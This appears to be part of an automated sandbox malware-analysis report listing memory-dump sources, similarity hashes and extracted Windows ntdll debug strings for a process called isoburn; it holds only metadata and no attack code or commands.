                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                            • Opcode ID: be0491c9d102841463c0584c93a4a892f276370d3c46122e68ea72e492ccb47d
                                                                                                                            • Instruction ID: 0923febb60fc3fe5720fa110ce63bf3a70e76abe354232a0f4a489a12889b6dd
                                                                                                                            • Opcode Fuzzy Hash: be0491c9d102841463c0584c93a4a892f276370d3c46122e68ea72e492ccb47d
                                                                                                                            • Instruction Fuzzy Hash: 71511379A00646AFEB20DE5CD8D09BFB7FAAF44200B448459E896D7641E7B4EA40CB60
                                                                                                                            Strings
                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 05074787
                                                                                                                            • ExecuteOptions, xrefs: 050746A0
                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 050746FC
                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05074655
                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05074725
                                                                                                                            • Execute=1, xrefs: 05074713
                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05074742
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                            • API String ID: 0-484625025
                                                                                                                            • Opcode ID: d9d5313c52ae3ea3d16fb91fc118338ab97bd8472450526b5bae02b3054eaa49
                                                                                                                            • Instruction ID: d17322caf7b350ebe71a59d193aeb1d5e2586f1e8161c75f5af46e7e45d47270
                                                                                                                            • Opcode Fuzzy Hash: d9d5313c52ae3ea3d16fb91fc118338ab97bd8472450526b5bae02b3054eaa49
                                                                                                                            • Instruction Fuzzy Hash: 9951E3B1B00219BADF21EAA5BD9AFFE77ADFB14300F0400A9E505A7180DB71AB45CF55
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction ID: d07734d024f2e8e9fbdc8a4f7e37093742c9e31e24a79c3d6f0d1166a49abbea
                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                            • Instruction Fuzzy Hash: 7E020271608341AFC345DF18D494A6EFBE5FF88710F14892DB9898B264DB72E905CB62
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-$0$0
                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction ID: 3ed588ad53f797b3cf3106db19bc69498166bfcef5c765e5359cfaca5e1d35df
                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                            • Instruction Fuzzy Hash: BA81AFB0E092499ADF24DF68E991BFEBBE2BF45320F184169D892A7291C634D841CF50
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                            • Opcode ID: b1facb9652c22b45bca02833732f7cba68b3a95645e0f09166756b74cde3bb03
                                                                                                                            • Instruction ID: a31a54ab0fc1ce57342c5beadd696f904f3c750472713387a0e69f9803ba587c
                                                                                                                            • Opcode Fuzzy Hash: b1facb9652c22b45bca02833732f7cba68b3a95645e0f09166756b74cde3bb03
                                                                                                                            • Instruction Fuzzy Hash: D82179BAA0011AABDB10DF79EC94AFF77F9EF64650F080525ED05D3200E770D9028B91
                                                                                                                            Strings
                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 050702E7
                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 050702BD
                                                                                                                            • RTL: Re-Waiting, xrefs: 0507031E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                            • API String ID: 0-2474120054
                                                                                                                            • Opcode ID: 31ff30da731e191700107f3e99e8b41ead31677c76000c24561f99eefc45bc2d
                                                                                                                            • Instruction ID: 6f2c7e69e63dccf6335025974d451409f1fdfc53368be219729334358acf6af6
                                                                                                                            • Opcode Fuzzy Hash: 31ff30da731e191700107f3e99e8b41ead31677c76000c24561f99eefc45bc2d
                                                                                                                            • Instruction Fuzzy Hash: CDE1CD706087429FD724CF28E899B6EB7F1FB84364F144A29F4A68B2D0D774E845CB42
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05077B7F
                                                                                                                            • RTL: Resource at %p, xrefs: 05077B8E
                                                                                                                            • RTL: Re-Waiting, xrefs: 05077BAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: 220d97d71d9a162c4bf35bcd64e9a76a8395c689e749c41a1cfa5f983e155cb1
                                                                                                                            • Instruction ID: 6609b658d1ff0b43aa29819a0ab10cc64db0cb50e7db5fa3b2c2d8d3322dd4be
                                                                                                                            • Opcode Fuzzy Hash: 220d97d71d9a162c4bf35bcd64e9a76a8395c689e749c41a1cfa5f983e155cb1
                                                                                                                            • Instruction Fuzzy Hash: 2541F4317047068FC720DE29E842F6EB7EAFF84725F000A1DE95A9B280D771E4058B91
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0507728C
                                                                                                                            Strings
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05077294
                                                                                                                            • RTL: Resource at %p, xrefs: 050772A3
                                                                                                                            • RTL: Re-Waiting, xrefs: 050772C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 041f269f2c24da0cd2137bb7daf9134e4418685e5dc3516015e07b386417b117
                                                                                                                            • Instruction ID: d1ee9af7e29898b37f088d4120fa253a05941762efbced3d048e2d53db0a88b6
                                                                                                                            • Opcode Fuzzy Hash: 041f269f2c24da0cd2137bb7daf9134e4418685e5dc3516015e07b386417b117
                                                                                                                            • Instruction Fuzzy Hash: C841E131B04206ABC721DE25EC42F6EB7E6FB94754F100619FD559B240DB21F812CBD4
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: 4e65cc8d957d8ed643e023c45b28d9db45a09c8f0265086890cd19655d794d61
                                                                                                                            • Instruction ID: fe6df4dbf2d73ce7b4875fdc6e4c33828753cf7a9146b84263a1c5b3f19fb810
                                                                                                                            • Opcode Fuzzy Hash: 4e65cc8d957d8ed643e023c45b28d9db45a09c8f0265086890cd19655d794d61
                                                                                                                            • Instruction Fuzzy Hash: 4E315476A002199FDB60DE29DC84BEF77F8FF54610F454555E849E3240EB70AA458FA0
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.4170830820.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: true
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050F9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.00000000050FD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000007.00000002.4170830820.000000000516E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_4fd0000_isoburn.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280